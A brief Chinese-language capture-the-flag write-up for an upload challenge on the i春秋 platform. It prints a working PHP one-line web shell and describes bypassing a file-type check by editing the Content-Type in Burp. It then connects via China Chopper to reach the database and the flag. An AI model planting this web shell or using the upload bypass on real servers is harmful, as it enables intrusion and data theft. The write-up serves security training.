爱春秋-Do you know upload？

1、打开是一个上传的界面：

2、经测试，只能上传jpg文件，上传别的会显示文件类型错误。
3、上传一句话木马，使用burp抓包。

  <?php @eval($_POST['pass']);?>

改为image/jpeg

4、得到地址后用菜刀连接：

5、发现一个config文件，打开：

6、发现数据库，使用菜刀连接上这个数据库:

7、得到数据库，拿到flag。

总结：一句话木马+中国菜刀+数据库连接

一句话木马知识参考：https://blog.csdn.net/weixin_39190897/article/details/86772765